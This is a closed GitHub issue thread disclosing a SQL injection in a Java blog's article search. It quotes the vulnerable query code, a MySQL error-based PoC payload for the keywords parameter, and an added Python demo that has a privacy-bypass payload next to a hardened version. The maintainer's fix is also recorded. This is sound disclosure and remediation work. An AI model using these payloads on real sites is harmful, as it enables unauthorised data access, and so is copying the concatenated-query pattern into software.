
There is a SQL injection in the article search box #37

Closed
3lse opened this Issue Sep 18, 2018 · 4 comments

3lse commented Sep 18, 2018

Log.java

```java
// Search query as posted from Log.java: searchKeywords and pageSort are concatenated
// straight into the SQL text, while only the LIMIT offsets are bound as parameters.
String sql = "select l.*,l.privacy privacy,t.typeName,l.logId as id,l.last_update_date as lastUpdateDate,t.alias as typeAlias,u.userName,(select count(commentId) from " + Comment.TABLE_NAME + " where logId=l.logId ) commentSize from " + TABLE_NAME + " l inner join user u inner join type t where u.userId=l.userId" + searchKeywords + " and t.typeid=l.typeid order by " + pageSort + " limit ?,?";
data.put("rows", findEntry(sql, ParseUtil.getFirstRecord(page, pageSize), pageSize));
// The same concatenated searchKeywords string is reused for the paging count query.
ModelUtil.fillPageData(this, page, pageSize, "from " + TABLE_NAME + " l inner join user u where u.userId=l.userId " + searchKeywords, data, new Object[]{});
return data;
```

TABLE_NAME field not verified

3lse commented Sep 18, 2018

PoC:

```
keywords=aaaa') AND (SELECT 8405 FROM(SELECT COUNT(*),CONCAT(0x71706a6271,(SELECT (ELT(8405=8405,1))),0x7176787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('VybC'='VybC&_search=false&nd=1537172851162&rows=10&page=1&sidx=&sord=asc
```
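A runnable stand-in for the query shape reported in the Log.java snippet and exercised by the PoC above, added here as an example; it is not code from the issue or from the project (whose code is Java), and it uses Python with an in-memory SQLite database so that it runs offline. The schema, the sample rows, the assumed form of the `searchKeywords` clause (`and (l.title like '%…%')`) and the `ALLOWED_SORT` whitelist are all assumptions. The issue's PoC is error-based and MySQL-specific (`RAND`, `ELT`, `INFORMATION_SCHEMA.PLUGINS`), so the demo uses a constructed boolean payload with the same root cause, a quote that closes the `LIKE` clause, to pull `privacy=1` rows into a public search. The hardened version binds the keyword as a parameter and maps `pageSort` through a whitelist, because `ORDER BY` cannot take a bound parameter.

```python
import sqlite3

# Added example, not code from the issue or the project: a SQLite stand-in for the
# reported query, showing why concatenating searchKeywords and pageSort into the SQL
# text is injectable, and the same search with a bound parameter and a whitelisted
# sort column. Table and column names are simplified assumptions.

SCHEMA = """
create table user(userId integer primary key, userName text);
create table log(logId integer primary key, userId integer, title text,
                 privacy integer, last_update_date text);
"""

# Constructed sample rows: privacy=1 marks a draft that a public search must not expose.
USERS = [(1, "admin"), (2, "bob")]
LOGS = [
    (1, 1, "hello world", 0, "2018-09-18"),
    (2, 1, "private draft", 1, "2018-09-18"),
    (3, 2, "hello again", 0, "2018-09-19"),
]

# Hypothetical whitelist: the only ORDER BY targets the search page may request.
# ORDER BY cannot be parameterized, so mapping a request value to a fixed string is the fix.
ALLOWED_SORT = {
    "logId": "l.logId",
    "lastUpdateDate": "l.last_update_date",
    "title": "l.title",
}

# Constructed payload for this demo (the issue's MySQL PoC relies on RAND/ELT, which
# SQLite lacks): it closes the LIKE clause and ORs the private rows back in.
PRIVACY_BYPASS = "') or (l.privacy=1 and '' like '"


def setup():
    """Create the in-memory database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("insert into user values (?,?)", USERS)
    conn.executemany("insert into log values (?,?,?,?,?)", LOGS)
    return conn


def vulnerable_search(conn, keywords, page_sort, page=1, page_size=10):
    """Mirrors the reported shape: keyword clause and sort column are string-concatenated;
    only the LIMIT offsets are bound, so the '?' placeholders protect nothing else."""
    search_keywords = " and (l.title like '%" + keywords + "%')"
    sql = ("select l.logId, l.title, l.privacy, u.userName"
           " from log l inner join user u on u.userId=l.userId"
           " where l.privacy=0" + search_keywords +
           " order by " + page_sort + " limit ?,?")
    return conn.execute(sql, ((page - 1) * page_size, page_size)).fetchall()


def safe_search(conn, keywords, page_sort, page=1, page_size=10):
    """Hardened form: the keyword travels as a bound parameter, the sort column is
    looked up in the whitelist, and anything else is rejected before reaching SQL."""
    column = ALLOWED_SORT.get(page_sort)
    if column is None:
        raise ValueError("unsupported sort column: %r" % page_sort)
    sql = ("select l.logId, l.title, l.privacy, u.userName"
           " from log l inner join user u on u.userId=l.userId"
           " where l.privacy=0 and l.title like ?"
           " order by " + column + " limit ?,?")
    # % and _ inside keywords still act as LIKE wildcards; add an ESCAPE clause
    # if literal matching matters for the application.
    pattern = "%" + keywords + "%"
    return conn.execute(sql, (pattern, (page - 1) * page_size, page_size)).fetchall()


def leaked_private_rows(rows):
    """Rows with privacy=1 that a public search should never have returned."""
    return [r for r in rows if r[2] == 1]


if __name__ == "__main__":
    db = setup()
    print("normal search:", vulnerable_search(db, "hello", "l.logId"))
    print("leaked by payload:", leaked_private_rows(vulnerable_search(db, PRIVACY_BYPASS, "l.logId")))
    print("hardened search with payload:", safe_search(db, PRIVACY_BYPASS, "logId"))
```

Two points carry over to the posted Java: the paging count query passed to `ModelUtil.fillPageData` reuses the same concatenated `searchKeywords`, so both call sites need the bound form, and the `pageSort` sink cannot be fixed by a `?` placeholder at all, only by a whitelist or an equivalent fixed mapping.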

94fzb commented Sep 19, 2018

@3lse Thanks. This SQL injection needs admin login, so no need to worry; I will fix this bug in the coming days. Also, this SQL injection only works on the query statement.

@94fzb 94fzb added the bug label Sep 19, 2018

attritionorg commented Sep 28, 2018

@94fzb can you link to the fixing commit please?

@94fzb 94fzb closed this in 157b8fb Sep 28, 2018

attritionorg commented Sep 28, 2018

Thank you @94fzb!
